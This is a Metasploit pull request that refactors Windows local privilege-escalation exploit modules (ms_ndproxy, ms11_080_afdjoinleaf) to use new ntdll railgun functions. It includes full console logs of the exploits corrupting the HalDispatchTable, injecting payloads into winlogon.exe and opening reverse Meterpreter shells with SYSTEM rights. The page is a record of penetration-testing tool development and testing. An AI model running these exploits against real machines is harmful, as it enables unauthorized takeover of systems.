
Use new ntdll railgun functions #2762

Merged
merged 2 commits into from Dec 18, 2013

Conversation

jvazquez-r7
Contributor

Short history: @zeroSteiner added some functions to railgun, from ntdll, here: #2758

So it makes no sense that some modules still try to add them by themselves.

Verification

  • Get a session on any machine vulnerable to any of the modified exploits.
  • Run the module on the session
  • You should be enjoying a new SYSTEM session.

Verification is attached for ms11_080_afdjoinleaf and ms_ndproxy

  • ms_ndproxy
msf exploit(ms_ndproxy) > set session 1
session => 1
msf exploit(ms_ndproxy) > exploit

[*] Started reverse handler on 192.168.172.1:4444 
[*] Detecting the target system...
[*] Running against Windows XP SP3
[*] Checking device...
[+] \\.\NDProxy found!
[*] Disclosing the HalDispatchTable and hal!HaliQuerySystemInfo addresses...
[+] Addresses successfully disclosed.
[*] Storing the kernel stager on memory...
[+] Kernel stager successfully stored at 0x1000
[*] Storing the trampoline to the kernel stager on memory...
[+] Trampoline successfully stored at 0x1
[*] Storing the IO Control buffer on memory...
[+] IO Control buffer successfully stored at 0xd0d0000
[*] Triggering the vulnerability, corrupting the HalDispatchTable...
[*] Executing the Kernel Stager throw NtQueryIntervalProfile()...
[*] Checking privileges after exploitation...
[+] Exploitation successful! Creating a new process and launching payload...
[*] Injecting 290 bytes into 3804 memory and executing it...
[*] Sending stage (769024 bytes) to 192.168.172.244
[+] Enjoy
[*] Meterpreter session 2 opened (192.168.172.1:4444 -> 192.168.172.244:1045) at 2013-12-13 16:04:04 -0600

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : JUAN-C0DE875735
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

  • ms11_080_afdjoinleaf
msf exploit(ms11_080_afdjoinleaf) > set session 3
session => 3
msf exploit(ms11_080_afdjoinleaf) > exploit

[*] Started reverse handler on 10.6.0.165:4444 
[*] Running against Windows XP SP2 / SP3
[*] Kernel Base Address: 0x804d7000
[*] HalDisPatchTable Address: 0x80545838
[*] HaliQuerySystemInformation Address: 0x806e6bba
[*] HalpSetSystemInformation Address: 0x806e9436
[*] 192.168.172.244 - Meterpreter session 1 closed.  Reason: Died

[*] Triggering AFDJoinLeaf pointer overwrite...
[*] Injecting the payload into SYSTEM process: winlogon.exe PID: 636
[*] Writing 290 bytes at address 0x00a30000
[*] Sending stage (769024 bytes) to 10.6.0.165
[*] Restoring the original token...
[*] Meterpreter session 4 opened (10.6.0.165:4444 -> 10.6.0.165:57280) at 2013-12-13 16:05:42 -0600

meterpreter > 
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : JUAN-C0DE875735
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.172.244 - Meterpreter session 4 closed.  Reason: User exit

@wchen-r7
Contributor

Tested:

msf exploit(handler) > run

[*] Started reverse handler on 10.0.1.76:4444 
[*] Starting the payload handler...
[*] Sending stage (769024 bytes) to 10.0.1.122
[*] Meterpreter session 1 opened (10.0.1.76:4444 -> 10.0.1.122:3544) at 2013-12-18 15:16:09 -0600

meterpreter > background
[*] Backgrounding session 1...
msf exploit(handler) > use exploit/windows/local/ms11_080_afdjoinleaf 
msf exploit(ms11_080_afdjoinleaf) > show options

Module options (exploit/windows/local/ms11_080_afdjoinleaf):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(ms11_080_afdjoinleaf) > set session 1
session => 1
msf exploit(ms11_080_afdjoinleaf) > run

[*] Started reverse handler on 10.0.1.76:4444 
[*] Running against Windows XP SP2 / SP3
[*] Kernel Base Address: 0x804d7000
[*] HalDisPatchTable Address: 0x80545838
[*] HaliQuerySystemInformation Address: 0x806e6bba
[*] HalpSetSystemInformation Address: 0x806e9436
[*] Triggering AFDJoinLeaf pointer overwrite...
[*] Injecting the payload into SYSTEM process: winlogon.exe PID: 644
[*] Writing 290 bytes at address 0x00a70000
[*] Sending stage (769024 bytes) to 10.0.1.122
[*] Restoring the original token...
[*] Meterpreter session 2 opened (10.0.1.76:4444 -> 10.0.1.122:3546) at 2013-12-18 15:17:00 -0600

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >

wchen-r7 added a commit that referenced this pull request Dec 18, 2013
@wchen-r7 wchen-r7 merged commit e8396dc into rapid7:master Dec 18, 2013
@jvazquez-r7 jvazquez-r7 deleted the use_new_railgun_stuff branch November 18, 2014 15:58